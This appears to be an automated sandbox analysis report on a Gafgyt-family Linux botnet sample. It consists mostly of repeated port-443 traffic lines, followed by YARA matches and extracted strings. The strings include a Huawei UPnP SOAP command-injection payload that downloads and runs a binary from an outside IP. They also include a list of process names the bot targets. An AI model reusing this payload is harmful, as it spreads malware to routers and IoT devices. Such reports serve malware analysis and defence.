            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38248
            Source: unknownNetwork traffic detected: HTTP traffic on port 42806 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41888
            Source: unknownNetwork traffic detected: HTTP traffic on port 38396 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41886
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41880
            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41882
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53826
            Source: unknownNetwork traffic detected: HTTP traffic on port 51790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53828
            Source: unknownNetwork traffic detected: HTTP traffic on port 37852 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38232
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38234
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38236
            Source: unknownNetwork traffic detected: HTTP traffic on port 49078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38238
            Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53820
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38228
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41878
            Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41870
            Source: unknownNetwork traffic detected: HTTP traffic on port 54826 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41872
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53836
            Source: unknownNetwork traffic detected: HTTP traffic on port 48546 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54430 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42818 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53834
            Source: unknownNetwork traffic detected: HTTP traffic on port 38384 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53838
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38220
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38222
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38224
            Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38226
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53830
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38218
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41866
            Source: unknownNetwork traffic detected: HTTP traffic on port 42422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41862
            Source: unknownNetwork traffic detected: HTTP traffic on port 36142 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41864
            Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41860
            Source: unknownNetwork traffic detected: HTTP traffic on port 43302 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38172
            Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
            Source: unknownNetwork traffic detected: HTTP traffic on port 47642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
            Source: unknownNetwork traffic detected: HTTP traffic on port 36514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51150
            Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33970 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33500 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38160
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38162
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38164
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
            Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
            Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43784 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38150
            Source: unknownNetwork traffic detected: HTTP traffic on port 33994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33490 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38152
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38154
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
            Source: unknownNetwork traffic detected: HTTP traffic on port 36526 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38156
            Source: unknownNetwork traffic detected: HTTP traffic on port 60638 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38158
            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41790
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38140
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38142
            Source: unknownNetwork traffic detected: HTTP traffic on port 41086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
            Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
            Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
            Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
            Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
            Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
            Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
            Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
            Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
            Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
            Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
            Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
            Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
            Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
            Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
            Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
            Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
            Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
            Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
            Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
            Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
            Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
            Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
            Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
            Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37406 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
            Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
            Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
            Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53902
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
            Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
            Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
            Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
            Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
            Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
            Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38276 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41936
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41938
            Source: unknownNetwork traffic detected: HTTP traffic on port 50920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41932
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41934
            Source: unknownNetwork traffic detected: HTTP traffic on port 42050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41930
            Source: unknownNetwork traffic detected: HTTP traffic on port 33152 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55660 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41926
            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41928
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41922
            Source: unknownNetwork traffic detected: HTTP traffic on port 45568 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41458 -> 443

            System Summary

            barindex
            Source: huhu.arm5.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 5606.1.00007f7f64017000.00007f7f64036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: huhu.arm5.elf PID: 5606, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: /proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys//bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashbot.armbot.arm5bot.arm6bot.arm7bot.mipsbot.mpslbot.x86bot.x86_64bot.ppcbot.sh4bot.m68kskyljne.x86skyljne.ppcboskyljnet.m68ktelnetddropbearropbearencodercundi/var/cundi/system/root/dvr_gui//root/dvr_app//var/tmp//anko-app//data/local/tmp//opt//lib/systemd//usr/lib/systemd/system/system/bin//gm/bin//mnt//home/process//home/helper/home/davinci/z/bin//mnt/mtd//tmp/sqfs//usr/libexec//usr/sbin//z/zbin//usr/bin/usr/lib/openssh/sftp-server/home/POST /goform/set_LimitClient_cfg HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: /proc/proc/%d/cmdlinerwgetcurlbusyboxechocatnanotfpt
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: huhu.arm5.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 5606.1.00007f7f64017000.00007f7f64036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: huhu.arm5.elf PID: 5606, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: classification engineClassification label: mal76.troj.linELF@0/1025@15/0
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/110/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/231/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/111/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/112/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/233/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/113/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/114/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/235/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/115/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/1333/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/116/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/1695/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/117/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/118/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/119/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/911/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/914/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/10/cmdlineJump to behavior
            Source: /tmp/huhu.arm5.elf (PID: 5612)File opened: /proc/917/cmdlineJump to behavior
